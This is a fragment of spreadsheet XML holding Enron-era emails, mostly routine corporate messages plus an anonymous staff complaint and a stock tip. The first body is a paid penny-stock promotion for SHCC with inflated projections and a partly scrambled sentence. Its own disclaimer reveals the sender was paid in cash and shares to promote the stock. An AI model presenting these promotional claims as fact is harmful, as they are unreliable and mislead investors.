    <t>frozenset({'shcctrade@eudoramail.com'})</t>
  </si>
  <si>
    <t>frozenset({'money.in.motion@mailman.enron.com'})</t>
  </si>
  <si>
    <t>Tonight's Investment Special                   MZAZ</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
=20_x000D_
 Investment Special  Tonight's Feature Company=09_x000D_
 ShareCom, Inc. (OTCBB: SHCC)  Current Price: $0.0063  52 Week High: $2.49 =_x000D_
52 Week Low: $0.0062        Why SHCC?   SHCC has established business relat=_x000D_
ionships with FEMA, the American Red Cross, AAA, NOAA, and more.   SHCC is =_x000D_
currently booking revenues of $45,000 per month and projects revenues of $1=_x000D_
3 million for 2002.   On January 17th, SHCC showed its continued growth tra=_x000D_
ck through its new partnership with Maxwood Technology to produce breakthro=_x000D_
ugh emergency broadcast products.   The Time is NOW at Sharecom  The Federa=_x000D_
l Emergency Management Agency (FEMA), the National Weather Service (NWS), t=_x000D_
he Red Cross and AAA are a but a few of the agencies and organizations with=_x000D_
 whom ShareCom Inc. has forged alliances to ensure clear competitive advant=_x000D_
age for its product lines. The past 10 years have seen a dramatic increase =_x000D_
in severe weather conditions, and with continued global warming these patte=_x000D_
rns will become worse. Prompted by FEMA and NWS aggressive programs, demand=_x000D_
 for the company's NOAA radios will soar.  Today 7% of American homes posse=_x000D_
ss an NOAA radio.  The national goal is 100%.  Sharecom's www.WeatherRadios=_x000D_
.com is the site for consumers to purchase the company's superior product a=_x000D_
t a significant discount. SHCC's revenue flow rate is at $45,000/month and =_x000D_
rapidly growing. The Company will realize a profit this year and plans to t=_x000D_
riple it next.. SHCC's market dominance in this growing "bread and butter",=_x000D_
 niche business makes it an interesting acquisition candidate and a compell=_x000D_
ing investment.  This Just Out: SHCC NEWS     ShareCom Partners With Maxwoo=_x000D_
d Technology to Produce Breakthrough NOAA Emergency Broadcast Products  Inn=_x000D_
ovative NOAA Emergency Radio products Unveiled at CES 2002  PALATINE, Ill.-=_x000D_
-(BUSINESS WIRE)--Jan. 17, 2002-- ShareCom, a leading marketing and sales o=_x000D_
rganization which specializes in NOAA Weather Radio Products, today announc=_x000D_
ed the formation of a strategic alliance with Maxwood Techics BHD and NIKKO=_x000D_
 CO., LTD.--to design, develop, manunology LTD., an affiliate and partner o=_x000D_
f NIKKO Electronfacture, market and sell specialized unique Emergency Weath=_x000D_
er Radio Products never before seen by the consumer electronics industry!  =_x000D_
The partnership has developed three specialized products that ShareCom has =_x000D_
introduced, including the latest Homeland Security device introduced at the=_x000D_
 2002 Consumer Electronics Show.  In addition to the valued priced WRP-50 W=_x000D_
eather Radio, ShareCom has introduced two very special and unique products:=_x000D_
  The WRP-500 is a New Graphical Interface Emergency Radio that features a =_x000D_
PDA style readout that will allow the end user to track weather related bro=_x000D_
adcasts on a map of the county that the emergency notification from NOAA is=_x000D_
 broadcast in. This model will also feature a 20 memory tracking capability=_x000D_
 that will store the last 20 alerts including the time of date, date and na=_x000D_
ture of the alerts so the end user can track a storm/emergency as it develo=_x000D_
ps. This unit also features a 20 hour battery back up the will allow the en=_x000D_
d user complete warning capability in the case that power is lost to the ho=_x000D_
me. With the county codes built into the software, this model is the easies=_x000D_
t NOAA Weather Radio on the market to program.  The WRP-900 is a unique com=_x000D_
puter based homeland security product that will interface with any PC or se=_x000D_
rver network, and will allow people in offices, business and homes to have =_x000D_
the most up-to-date weather or national emergency information directly from=_x000D_
 the federal government. NOAA will be able to broadcast FEMA warnings as we=_x000D_
ll as supply information for "follow on'' details as to where to go to get =_x000D_
food, water, medical help or shelter in the area of a national emergency to=_x000D_
 weather related disaster.  "Our ability to develop and produce unique and =_x000D_
strategic products is significantly enhanced as a result of this partnershi=_x000D_
p," says Brad Nordling, President and CEO of ShareCom, Inc. "Maxwood Techno=_x000D_
logy has a tremendous amount of technical abilities that we will rely upon =_x000D_
in producing the highest quality products possible."  "We are pleased to be=_x000D_
 able to work with ShareCom as a strategic partner in developing and manufa=_x000D_
cturing communications products that will help inform and protect citizens =_x000D_
in the United States of America," Kunihiko Ichioka, President and CEO of Ma=_x000D_
xwood Technology Ltd.     Stay tuned for more announcements to come  More R=_x000D_
easons to Consider Buying SHCC  1. WeatherRadios.com has been awarded a Nat=_x000D_
ional Partnership with the Federal Emergency Management Agency (FEMA) to in=_x000D_
crease the use of Weather Radios countrywide through a program called Proje=_x000D_
ct Impact. There are 2,600 Project Impact communities in the U.S. The FEMA =_x000D_
website lists WeatherRadios.com as a national partner  providing a banner a=_x000D_
nd link to the WeatherRadios.com site. The FEMA site receives over 100,000 =_x000D_
visitors per day.  2.  The National Oceanic and Aerospace Administration (N=_x000D_
OAA) has WeatherRadios.com listed first on their web site page that tells p=_x000D_
eople where to purchase a NOAA Weather Radio.  3.  The National Weather Ser=_x000D_
vice (NWS) has offered to promote corporate sponsorships to the WeatherRadi=_x000D_
os.com site through  recognition and media support.  4.  Local American Red=_x000D_
 Cross chapters will promote NOAA Weather Radios through WeatherRadios.com =_x000D_
in exchange for a $5.00 donation per sold radio.  5.  The Chicago area AAA =_x000D_
will feature SHCC's  2WayTalk.com on its website offering exclusive discoun=_x000D_
ts on Weather Radios, and FRS Family Radios. 2WayTalk.com will also be  lis=_x000D_
ted in the AAA magazine called "Home and Away".  6.  The Federation of Manu=_x000D_
factured Home Owners of Florida (FMO) has entered into a one-year agreement=_x000D_
 that will increase the sale of Weather Radios from the WeatherRadios.com s=_x000D_
ite. Mailings and web site links will offer a group discount to members and=_x000D_
 also pay a rebate to the organization for every radio sold.  7.  The Owner=_x000D_
-Operator Independent Drivers Association (OOIDA) has begun to promote the =_x000D_
discount that is offered  through WeatherRadios.com site. Magazine articles=_x000D_
, mailings and web site links will offer a group discount to members and al=_x000D_
so pay a rebate to the organization for every radio sold. This      agreeme=_x000D_
nt will run for one year.  Why Weather Radios are Poised for Growth  NOAA W=_x000D_
eather Radios automatically alert people of impending severe weather condit=_x000D_
ions "24/7". This is especially critical for families while sleeping. These=_x000D_
 devices are fast becoming recognized as essential and potentially life sav=_x000D_
ing for use in homes, businesses, and critical care facilities.  The Nation=_x000D_
al Weather Service (NWS) has stated that there has been an increase in seve=_x000D_
re weather in the last 10 years and this trend is expected to continue. NWS=_x000D_
 has a published goal for NOAA Weather Radios to be in every home within th=_x000D_
e next 10 years. Currently, approximately just 7% of homes have this device=_x000D_
. This being said, we can expect a tremendous increase in the presence and =_x000D_
sale of weather radios over the coming years. The NWS, NOAA, the Federal Em=_x000D_
ergency Management Agency (FEMA) and other government agencies have an aggr=_x000D_
essive education and funding effort to reach the 100% goal.  New technology=_x000D_
 called Specific Area Message Encoding (SAME) was introduced in the mid 90s=_x000D_
. It allows users to set an alarm only for their specific geographic area. =_x000D_
This feature is expected to make this tool commonplace in homes alerting fa=_x000D_
milies of weather conditions that pose an immediate danger.   Additionally,=_x000D_
 2WayTalk.com will continue to focus on Internet users who are outdoor enth=_x000D_
usiasts. The market continues to be strong and growing. FRS Family Radios a=_x000D_
re now becoming a popular family item on vacations, ski trips, camping, and=_x000D_
 biking events. They are used for a wide variety of purposes, from staying =_x000D_
in touch with children playing in the neighborhood, to coordinating soccer =_x000D_
tournaments and antique auctions.   A Final Word About SHCC  SHCC is curren=_x000D_
tly booking $45,000/ month and is conservatively projecting earnings next y=_x000D_
ear of $1.3 million on revenues of $13 million. Unlike most e-commerce vent=_x000D_
ures, ShareCom's marketing "burn rate" is very modest. The Company forecast=_x000D_
s revenues of $32.5 million the following year, increasing profitability to=_x000D_
 earn $4.6 million. Given its impressive relationships and the rapidly grow=_x000D_
ing market for its product, SHCC's share price of just 1.6 cents makes it a=_x000D_
 compelling play for the astute investor. =09_x000D_
 To be removed from future mailings, please reply to this email with "Remov=_x000D_
e" in the subject line   DISCLAIMER:  Information within this email contain=_x000D_
s "forward looking statements" within the meaning of Section 27A of the Sec=_x000D_
urities Act of 1933 and Section 21B of the Securities Exchange Act of 1934.=_x000D_
 Any statements that express or involve discussions with respect to predict=_x000D_
ions, expectations, beliefs, plans, projections, objectives, goals, assumpt=_x000D_
ions or future events or performance are not statements of historical fact =_x000D_
and may be "forward looking statements."  Forward looking statements are ba=_x000D_
sed on expectations, estimates and projections at the time the statements a=_x000D_
re made that involve a number of risks and uncertainties which could cause =_x000D_
actual results or events to differ materially from those presently anticipa=_x000D_
ted. Forward looking statements in this action may be identified through th=_x000D_
e use of words such as "projects", "foresee", "expects", "will,"  "anticipa=_x000D_
tes," "estimates," "believes," "understands" or that by statements indicati=_x000D_
ng certain actions "may," "could," or "might" occur.  All information provi=_x000D_
ded within this email pertaining to investing, stocks, securities must be u=_x000D_
nderstood as information provided and not investment advice. Investment New=_x000D_
s Alert advises all readers and subscribers to seek advice from a registere=_x000D_
d professional securities representative before deciding to trade in stocks=_x000D_
 featured within this email.  None of the material within this report shall=_x000D_
 be construed as any kind of investment advice.  In compliance with the Sec=_x000D_
urities Act of 1933, Section17(b), Investment Special discloses the receipt=_x000D_
 of $20,000 cash from a third party for the publication of this report and =_x000D_
additional services related to SHCC.  In addition, Investment Special discl=_x000D_
oses the receipt of fifteen million unrestricted shares of SHCC from a thir=_x000D_
d party for the publication of this report and additional services related =_x000D_
to SHCC.  Be aware of an inherent conflict of interest resulting from our i=_x000D_
ntent to profit from the sale of these shares.  Part or all of our position=_x000D_
 may be liquidated at any time, even after we have made positive statements=_x000D_
 regarding the above company.  All factual information in this report was g=_x000D_
athered from public sources, including but not limited to SEC filings, Comp=_x000D_
any Press Releases, and Market Guide.  Investment Special  believes this in=_x000D_
formation to be reliable but can make no guarantee as to its accuracy or co=_x000D_
mpleteness. Use of the material within this email constitutes your acceptan=_x000D_
ce of these terms.   To be removed from future mailings, please reply to th=_x000D_
is email with "Remove" in the subject line=09_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 04:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'enron.committee@enron.com', 'enron.1@enron.com', 'enron.2@enron.com', 'ect.europe@enron.com'})</t>
  </si>
  <si>
    <t>Organisational Change</t>
  </si>
  <si>
    <t>As a continuation of the integration of Enron Metals into Enron Europe we are _x000D_
pleased to announce the following organisational changes which become _x000D_
effective immediately._x000D_
_x000D_
Tom McKeever, presently Chairman of Enron Metals will move into the role of _x000D_
Vice Chairman Enron Europe reporting directly to John Sherriff and Michael _x000D_
Brown.  Tom will focus on developing our key senior business relationships _x000D_
across all of Enron Europe._x000D_
_x000D_
Joe Gold will become President of Enron Metals responsible for the entire _x000D_
organization.  We will announce Joe's replacement for managing our trading _x000D_
and origination efforts on the Continent in the near future._x000D_
_x000D_
Michael Farmer and Michael Hutchinson will continue in their roles managing _x000D_
the Metals's Merchanting and Financial Trading businesses respectively._x000D_
_x000D_
Please join us in congratulating Tom and Joe on their new roles._x000D_
_x000D_
From the Enron Europe Office of the Chairman</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 07:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'lora.sullivan@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Last FINAL version</t>
  </si>
  <si>
    <t>Lora:_x000D_
_x000D_
This is the new "Final" version.  The difference from the earlier version is _x000D_
- a few slides were taken out and the order of the remaining slides were _x000D_
rearranged._x000D_
_x000D_
Please get a copy of this new "Final" to Ken Lay.  _x000D_
_x000D_
Thanks._x000D_
_x000D_
----- Forwarded by Maureen McVicker/NA/Enron on 06/21/2001 02:53 PM -----_x000D_
_x000D_
	Ursula Brenner_x000D_
	06/21/2001 01:05 PM_x000D_
		 _x000D_
		 To: Karen Denne/Corp/Enron@ENRON, Steven J Kean/NA/Enron@Enron_x000D_
		 cc: Maureen McVicker/NA/Enron@Enron_x000D_
		 Subject: Last version_x000D_
_x000D_
This is the final version, including the changes Jeff just requested._x000D_
_x000D_
_x000D_
_x000D_
Ursula</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 12:39:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'edward.gottlob@enron.com'})</t>
  </si>
  <si>
    <t>RE: EEX bid</t>
  </si>
  <si>
    <t>Jill is not representing the pipeline anymore Brian Riley should be handling this for EEX</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 10:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>NA PA &amp; ETA</t>
  </si>
  <si>
    <t xml:space="preserve">Tana,_x000D_
_x000D_
Attached below is the latest version of the North American Password _x000D_
Application and Electronic Trading Agreement._x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Frank_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 02:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>lamar smith</t>
  </si>
  <si>
    <t>http://www.sun-sentinel.com/sports/daily/detail/0,1136,33500000000108999,00.ht_x000D_
ml?</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 00:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Year End 2000 Performance Feedback</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APOLLO, BETH                    FERNLEY DYSON                   Oct 31, 2000_x000D_
MASON, HEIDI                    FERNLEY DYSON                   Oct 26, 2000_x000D_
MCLOUGHLIN, HECTOR              SHEILA H WALTON                 Oct 25, 2000_x000D_
PORT, DAVID                     THEODORE R MURPHY II            Oct 30, 2000_x000D_
STOCK, STEPHEN                  BETH S PERLMAN                  Oct 31, 2000_x000D_
WALTON, SHEILA H                DAVID OXLEY                     Oct 27, 2000</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 10:02:02 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'risk@enron.com', 'gordon.joseph@enron.com', 'jeff.king@enron.com', 'john.suarez@enron.com', 'garrison.matt@enron.com', 'corny@enron.com', 'barry.ta@enron.com', 'tingleaf.drew@enron.com', 'cc@enron.com', 'tomson.l@enron.com', 'forester.dh@enron.com', 'nmistry@enron.com', 'vaccaro.john@enron.com', 'stda@enron.com', 'b.stephanie@enron.com', 'rpad@enron.com', 'myers.je@enron.com', 'lohfeld.kristin@enron.com', 'prisco.pamela@enron.com', 'lmcphail@enron.com', "o'neal.sean@enron.com", 'king.byron@enron.com', 'mmoore@enron.com', 'tamplen.brian@enron.com', 'stenberg.steve@enron.com', 'mike.carson@enron.com', 'stanton.scott@enron.com', 'mboyle@enron.com', 'yamamura.alan@enron.com', 'weinstein.scott@enron.com', 'zammit.christophe@enron.com', 'krothe.joe@enron.com', 'belavielle@enron.com', 'jkech@enron.com'})</t>
  </si>
  <si>
    <t>Amerex Power Closing Marks for 12-21-2001</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
  _x000D_
 - 12-21-2001.xls </t>
  </si>
  <si>
    <t>Tue, 1 May 2001 07:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Welcome - John Van Gelder</t>
  </si>
  <si>
    <t>John Van Gelder has recently transferred from EBS-Portland to work in the _x000D_
West Origination group._x000D_
_x000D_
John began working with Enron Energy Services as a summer intern in 1998. In _x000D_
January 2000, he started working with Enron Broadband Services, and was _x000D_
promoted from Associate to Manager while working with their Wholesale _x000D_
Origination group._x000D_
_x000D_
John received his Bachelors degree in Mechanical Engineering at the _x000D_
University of Kansas and completed the Master's program at the University of _x000D_
Michigan's School of Business Administration._x000D_
_x000D_
Please welcome John to our Portland office!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 07:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'clearbot@mailblaster.clearstation.com'})</t>
  </si>
  <si>
    <t>frozenset({'kensey_subscriber@mailman.enron.com'})</t>
  </si>
  <si>
    <t>(ClearStation) Recommendation : EMC (Long) by kensey , Wed Dec 13_x000D_
 2000</t>
  </si>
  <si>
    <t xml:space="preserve">===================================================_x000D_
APPLY TODAY AND SHOW TOMORROW!_x000D_
Don't worry about haggling or overpaying for a loan._x000D_
With E-LOAN you can apply in minutes, get a great rate_x000D_
and negotiate like a cash buyer. Apply today at_x000D_
http://www.wheels.eloan.com/cgi-bin/autoloans?context=auto_x000D_
or call 1-888-ELOAN-22. Assumes new auto purchase with_x000D_
excellent credit._x000D_
===================================================_x000D_
_x000D_
Recommend emails are a powerful way to get investment tips as they happen_x000D_
from the ClearStation community. If you would like to UNSUBSCRIBE, go to_x000D_
http://www.clearstation.com/doc/unsub_kensey.html_x000D_
_x000D_
*NOTE : DO NOT reply to this email. Replies should be made within 'Discuss'_x000D_
at the url given below._x000D_
+-+-+-+-+-+-+-+-+-_x000D_
'kensey' has recommended EMC (Long) at Dec 13 2000  3:15PM_x000D_
_x000D_
EMC Corp ( NYSE : EMC )_x000D_
Computer - Storage Devices : 0 new highs in group of 31_x000D_
_x000D_
Symbol       Last     Time     Change     High      Low     Volume_x000D_
-----        ----     ----      -----     ----      ---      -----_x000D_
EMC         79.12   2:55PM      -3.00    87.00    77.75 11,779,800_x000D_
_x000D_
Community Take_x000D_
--------------_x000D_
627 Long / 26 Short_x000D_
_x000D_
'kensey' said:_x000D_
Wed Dec 13 15:05:07 2000_x000D_
_x000D_
find EMC attractive at 77 1/2.  launching accumulation operations._x000D_
meaning, time perspective is 'long term core technology holding'._x000D_
unless (of course) the fundamentals deteriorate._x000D_
_x000D_
will they?_x000D_
_x000D_
briefings take from a bit ago._x000D_
_x000D_
16-Nov-00 11:23 ET_x000D_
_x000D_
EMC Corp. (EMC)90 +1 3/16: A forward p/e of 87x is not scaring Bank of _x000D_
America Securities from initiating coverage of the king of storage _x000D_
infrastructure_x000D_
with a Strong Buy and a 12-month $120 price target. The analyst views EMC as _x000D_
a core holding for technology investors and believes storage is an essential_x000D_
component of Internet infrastructure. Also, Bank of America believes EMC is _x000D_
one of five pillars of technology, joining Microsoft, Intel, Cisco and _x000D_
Sun....EMC's_x000D_
two goals are: 1) while EMC dominates the storage area network (SAN) arena, _x000D_
they are looking to penetrate the network attached storage (NAS) space and 2)_x000D_
increase software to reach 20% of sales. Entering the NAS field is a cause _x000D_
for concern for investors of players in that space, particularly Network _x000D_
Appliance_x000D_
(NTAP), the NAS leader. EMC's management believes the company will be the _x000D_
leader in the NAS market in 2001. The company believes that the upcoming_x000D_
launch of its new mid-market appliance will go a long way towards achieving _x000D_
this goal. This mid-range NAS product, code-named Chameleon could be a drag_x000D_
on the shares of NTAP when unveiled. While EMC has a long way to go before _x000D_
outstaging NTAP in the NAS space, this launch will be a precursor of _x000D_
additional_x000D_
competition which would pressure margins. Network Appliance recently warned _x000D_
of slowing sequential growth rates. On the software front, EMC's recent_x000D_
purchase of CrosStor is the latest of several software acquisitions in its _x000D_
effort to boost software sales to 20%. The industry is realizing that _x000D_
software is one of the_x000D_
key features that separates a million-dollar EMC storage system from a few _x000D_
dozen $500 hard disks. EMC uses software to fend off increasing competition _x000D_
from_x000D_
IBM, Sun Microsystems and others. However, the CrosStor acquisition is a help _x000D_
to both of EMC's goal as its software is primarily used in the NAS_x000D_
market....EMC is unique in that it provides an end-to-end storage _x000D_
infrastructure portfolio consisting of storage systems (both SAN and NAS), _x000D_
software,_x000D_
networking and service and support. We believe the company has tremendous _x000D_
upside, but at such a high multiple, we would be wary of entering the stock _x000D_
at these_x000D_
levels. -- Robert J. Reid, Briefing.com_x000D_
_x000D_
the key point briefing seems to make is that the fundamental story is_x000D_
intact and that management is moving in agro fashion to get more_x000D_
revenue streams on-line.  one objective : number 1 category player_x000D_
in NAS.  that sounds overly agro.  which is good regardless of_x000D_
whether they get there by 2001._x000D_
_x000D_
the caveat briefing notes is that valuation issues need to be worked out._x000D_
this note was penned with the stock at 90.  it is now at 77.  so these_x000D_
issues do seem to be working themselves out._x000D_
_x000D_
support at 76 and then 72._x000D_
_x000D_
important to watch interactive of price and volume at these_x000D_
important support points._x000D_
_x000D_
what moves the market next?  that seems quite clear : the tuesday FOMC_x000D_
meeting.  feeling here is that after this bit of selling dries up, the market_x000D_
rallies into the FOMC meeting.  the selling seems to be on relatively low_x000D_
volume and of the profit taking garden variety._x000D_
_x000D_
kensey_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
See the annotated graph of this recommendation at:_x000D_
_x000D_
http://www.clearstation.com/cgi-bin/bbs?Cmd=post&amp;post_id=1864135_x000D_
+-+-+-+-+-+-+-+-+-_x000D_
Recommend emails are a powerful way to get investment tips as they happen_x000D_
from the ClearStation community. If you would like to UNSUBSCRIBE, go to_x000D_
http://www.clearstation.com/doc/unsub_kensey.html_x000D_
_x000D_
ClearStation is not an investment advisory service,_x000D_
nor a registered investment advisor or broker-dealer and_x000D_
does not purport to tell or suggest which securities_x000D_
members should buy or sell for themselves. Members should_x000D_
always check with their licensed financial advisor_x000D_
and their tax advisor to determine the suitability of_x000D_
any investment._x000D_
ClearStation, Inc. is a wholly-owned subsidiary of_x000D_
E*TRADE Group, Inc. and an affiliate of E*TRADE_x000D_
Securities, Inc. and E*TRADE Bank. E*TRADE Securities,_x000D_
Inc. and E*TRADE Bank are wholly-owned subsidiaries of_x000D_
E*TRADE Group, Inc. E*TRADE Bank deposits are insured up_x000D_
to $100,000 by the FDIC. E*TRADE Bank and E*TRADE_x000D_
Securities, Inc. are separate but affiliated companies._x000D_
E*TRADE brokerage accounts are maintained by E*TRADE_x000D_
Securities, Inc. Products offered by E*TRADE Securities,_x000D_
Inc. are not insured by the FDIC, are not deposits or_x000D_
obligations of E*TRADE Bank, are subject to investment_x000D_
risk, including possible loss of principal invested._x000D_
ClearStation is a registered trademark of ClearStation, Inc._x000D_
E*TRADE is a registered trademark of E*TRADE Securities,_x000D_
Inc. Member NASD/SIPC._x000D_
Copyright (c) 2000. ClearStation, Inc. All rights reserved._x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Jan 2001 06:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>LNG VaR limit Request Form</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Vince_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/17/2001 _x000D_
02:58 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Groves                           01/17/2001 02:39 PM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: LNG VaR limit Request Form_x000D_
_x000D_
Vince,_x000D_
_x000D_
Please review the attached file.  When you are ready, I will bring you the _x000D_
original for your signature._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Jun 2001 03:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Crisis in Enron Japan</t>
  </si>
  <si>
    <t>Jeff wants to know what you think about this.  SRS_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  ""m y-" &lt;enronsato@hotmail.com&gt;@ENRON _x000D_
[mailto:IMCEANOTES-+22+BFm+20+B2+A1+22+20+3Cenronsato+40hotmail+2Ecom+3E+40ENR_x000D_
ON@ENRON.com] _x000D_
Sent: Saturday, June 16, 2001 2:41 AM_x000D_
To: Skilling, Jeff_x000D_
Subject: Crisis in Enron Japan_x000D_
_x000D_
Dear top management,_x000D_
_x000D_
I know how dangerous if I use my real name so please forgive me to_x000D_
use this free email._x000D_
I studied Enron for a long time before there is a branch in Tokyo._x000D_
How glad when I received the offer from Enron Japan! I believe my life must_x000D_
have been changed to a new chapter._x000D_
_x000D_
But now... I'm so disppointed with enron Japan's poor management._x000D_
We local staff think Joe and other "experts" are too young to manage_x000D_
this company. Forgive my impolite, EJ is really like a kindergarden!_x000D_
_x000D_
In order not to waste your time,I conclude some points here:_x000D_
_x000D_
1. Joe's poor management not only makes everything confused but also_x000D_
makes local staff fears. He is so cold and imprudent that Japanese is_x000D_
difficult to communicate with him. I know he is from Harvard,but that_x000D_
doesn't_x000D_
mean he is human,he is sensitive._x000D_
_x000D_
2. It's very obvious that Joe conflicted with Jonathan and now we don't_x000D_
think he works well with Jeremy. We want to know why you top management_x000D_
always make such kind of combination. Joe only trusts the people he worked_x000D_
together in Norway and Australia. He has strong discrimination with Jonathan_x000D_
and Jeremy's people,also has strong discimination with local staff._x000D_
_x000D_
3. Enron Metal is in the same office with us but like a completely different_x000D_
company. No any communication between Enron Japan and Enron metal.The same_x000D_
situation can be seen with E-power.Japanese mass media are suprised why_x000D_
Enron_x000D_
set up two companies in Japan. E-power is enough!!! Look at GE, why they_x000D_
succeed_x000D_
the business in Asia. They make joint venture company first. Until they are_x000D_
convinced they can succeed, they open branch. Learn from GE!_x000D_
_x000D_
4. The experts from overseas countries are really cheeky,they are not modest_x000D_
to hear local staff's opinions but just push their methods to us. We can't_x000D_
see any_x000D_
democracy in this company!! If you want to succed your business,you should_x000D_
also_x000D_
hear some opposite ideas.You shouldn't alianate the people who say different_x000D_
things! We don't need young associate! Let them go home!!_x000D_
_x000D_
5. We don't need young experts because Japanese clients won't do business_x000D_
if the counterparty is too young. All of the young experts should go home._x000D_
They are wasting enron's money!! To send young experts here doesn't match_x000D_
Japanese culture._x000D_
_x000D_
_x000D_
All of these are true. I love Enron and want to see Enron Japan become a_x000D_
comfortable and profitable place to work._x000D_
_x000D_
Thanks&amp;regards_x000D_
Sato_x000D_
_x000D_
__________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 23:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rross@aep.com'})</t>
  </si>
  <si>
    <t>DC Tie Language</t>
  </si>
  <si>
    <t>Attached is the language regarding the DC Tie exemption which will be_x000D_
brought to the RUG for approval at the December 6th meeting. ? This_x000D_
language is intended to implement the concept/policy approved by the RUG at_x000D_
the October 23rd meeting. ?The attached document is the PIwG Reconciliation_x000D_
Form for PIP 109 from the November 2 &amp; 3rd PIwG meeting. ?I have revised_x000D_
the language shown in the form to reflect comments I received after that_x000D_
meeting which I believe improve what discussed at that meeting...._x000D_
._x000D_
_x000D_
_x000D_
Gig'em Aggies_x000D_
_x000D_
C. Richard Ross_x000D_
American Electric Power_x000D_
918.594.4262_x000D_
_x000D_
 - ERCOT PIWG Reconciliation 109 DC Tie.doc</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 02:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'master.amar@hoegh.no'})</t>
  </si>
  <si>
    <t>frozenset({'dan@enron.com', 'wayne.perry@enron.com', 'tony.galt@enron.com', 'masters@enron.com', 'barbo@enron.com', 'dan.masters@enron.com', 'jim.fernie@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>VOY. ORDER 002-01</t>
  </si>
  <si>
    <t>Dear Sir's_x000D_
_x000D_
Aknowledge receipt of voyage order no. 002-01._x000D_
_x000D_
Brgds Oe. Hansen_x000D_
Master_x000D_
_x000D_
E-mail: master.gall@hoegh.no_x000D_
Teleph: Inmarsat tel.no. 330853910_x000D_
Fax   : Inmarsat fax no. 330853913_x000D_
Telex : Inmarsat B telex no.330853915_x000D_
Telex : Inmarsat C telex no.430853910 (24hrs.watch)</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 07:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Enron/Delta Turbine Acquisition</t>
  </si>
  <si>
    <t xml:space="preserve">Danetta worked it for the  Fountain Valley project.  How long has she been _x000D_
here?  I didn't know there was anyone other than you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Shoemaker, Kent (GEAE)" &lt;kent.shoemaker@ae.ge.com&gt; on 04/02/2001 02:24:25 PM_x000D_
To: "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: Enron/Delta Turbine Acquisition_x000D_
_x000D_
Kay, unless I've lost my mind, I've never seen these docs before.  What deal_x000D_
was it on.  I don't have anything on CA Development.  I don't remember_x000D_
executing any attorney's opinions?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Monday, April 02, 2001 2:47 PM_x000D_
To: Shoemaker, Kent (GEAE)_x000D_
Subject: RE: Enron/Delta Turbine Acquisition_x000D_
_x000D_
_x000D_
_x000D_
Yes, this stuff is for the purchaser's bank._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Shoemaker, Kent (GEAE)" &lt;kent.shoemaker@ae.ge.com&gt; on 04/02/2001 01:45:44_x000D_
PM_x000D_
_x000D_
To:   "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  RE: Enron/Delta Turbine Acquisition_x000D_
_x000D_
Kay:  Is there anything different from the forms you and I worked on_x000D_
earlier._x000D_
_x000D_
Kent_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Monday, April 02, 2001 1:32 PM_x000D_
To: danetta.beaushaw@ps.ge.com_x000D_
Cc: kent.shoemaker@ae.ge.com; lee.johnson@ps.ge.com;_x000D_
Stephen.Thome@enron.com_x000D_
Subject: Enron/Delta Turbine Acquisition_x000D_
_x000D_
_x000D_
Hi Danetta,_x000D_
_x000D_
I heard a rumor that you are the one to look at this stuff.  I know that_x000D_
you recently went through the process in connection with the Fountain_x000D_
Valley transaction.  I'm happy to serve up those forms to Freshfields if_x000D_
that makes it is easier for you._x000D_
_x000D_
My number is 713 345 7566._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
